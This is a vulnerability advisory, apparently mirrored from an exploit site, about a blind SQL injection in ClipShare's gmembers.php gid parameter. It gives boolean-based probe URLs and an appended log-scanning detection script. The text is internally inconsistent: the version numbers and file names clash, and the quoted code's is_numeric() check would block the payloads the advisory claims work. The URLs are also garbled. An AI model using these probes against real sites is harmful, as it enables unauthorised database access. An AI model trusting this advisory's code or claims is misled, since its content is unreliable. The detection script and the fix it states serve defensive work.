
ClipShare 4.1.1 (gmembers.php, gid param) Blind Injection - Website Security

Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability

Author: Esac

Affected software: ClipShare - Video Sharing Community Script 4.1.4

Vendor site: http://HdhCmsTestclip-share测试数据

All versions affected

Note: this vulnerability only works if a group has been added to the community


# To exploit this vulnerability, the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

===============================

# Vulnerable script

PHP script: members.php, line 23


============ BEGIN OF gmembers.php =======

html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|******************************************************
| Copyright (c) 2006-2007 Clip-Share测试数据. All rights reserved.
|************************************************/

require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname = NULL;
$gurl = NULL;
$oid = NULL;

// gid is accepted when is_numeric() passes, escaped, then interpolated as a string into the query
$gid = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;

$sql = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs = $conn->execute($sql);

if ( $conn->Affected_Rows() == 1 ) {
    $urlkey = $rs->fields['gurl'];
    $gname = $rs->fields['gname'];
    $gupload = $rs->fields['gupload'];
    $oid = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................
?>

===================================================================================


PoC:

http://HdhCmsTest2cto测试数据 /mavideo/gmembers.php?gid=6 [Blind SQLi]


Real exploitation:

http://server/mavideo/gmembers.php?gid=6 AND 1=1

==> returns the normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2

==> returns a page with errors (or nothing at all, a white page)

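As an added example (not part of the original advisory), the following Python script scans web-server log lines for the true/false probe pair described above: it flags gmembers.php requests whose gid value is not a plain integer and notes when one client's probes produced responses of different sizes, which is the normal-page versus error-page differential a boolean-based blind injection depends on. The log lines, client addresses and response sizes are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample access-log lines (combined-log style, not real traffic).
# The second and third requests mirror the advisory's true/false probe pair.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Mar/2013:10:01:02 +0000] "GET /mavideo/gmembers.php?gid=6 HTTP/1.1" 200 5120
203.0.113.7 - - [24/Mar/2013:10:01:05 +0000] "GET /mavideo/gmembers.php?gid=6%20AND%201%3D1 HTTP/1.1" 200 5120
203.0.113.7 - - [24/Mar/2013:10:01:06 +0000] "GET /mavideo/gmembers.php?gid=6%20AND%201%3D2 HTTP/1.1" 200 812
198.51.100.3 - - [24/Mar/2013:10:02:00 +0000] "GET /mavideo/gmembers.php?gid=12 HTTP/1.1" 200 5090
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<size>\d+)'
)

def suspect_gid(target):
    """Return the decoded gid value of a gmembers.php request when it is
    not a plain integer (the only shape the script should accept); else None."""
    url = urlparse(target)
    if not url.path.endswith("/gmembers.php"):
        return None
    for value in parse_qs(url.query, keep_blank_values=True).get("gid", []):
        if not re.fullmatch(r"-?\d+", value.strip()):
            return value  # parse_qs has already percent-decoded it
    return None

def find_probes(log_text):
    """Group non-integer gid requests by client and note whether that client's
    probes produced responses of different sizes, i.e. the normal-page versus
    error-page differential the advisory's AND 1=1 / AND 1=2 pair looks for."""
    per_ip = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value = suspect_gid(m["target"])
        if value is not None:
            per_ip.setdefault(m["ip"], []).append((value, int(m["size"])))
    return {
        ip: {"payloads": [v for v, _ in hits],
             "differential": len({s for _, s in hits}) > 1}
        for ip, hits in per_ip.items()
    }

if __name__ == "__main__":
    for ip, info in find_probes(SAMPLE_LOG).items():
        print(ip, info)
```

On the application side the fix is to cast gid to an integer, or bind it as an integer parameter in a prepared statement, rather than interpolating an escaped string into the query.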

--------------------------------------------------

PwnEd.

Tested version:

Sunday, March 24, 2013 | Version: 4.1.4 | Username: admin | Logout

Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz: White Tarbouch Team

./Esac
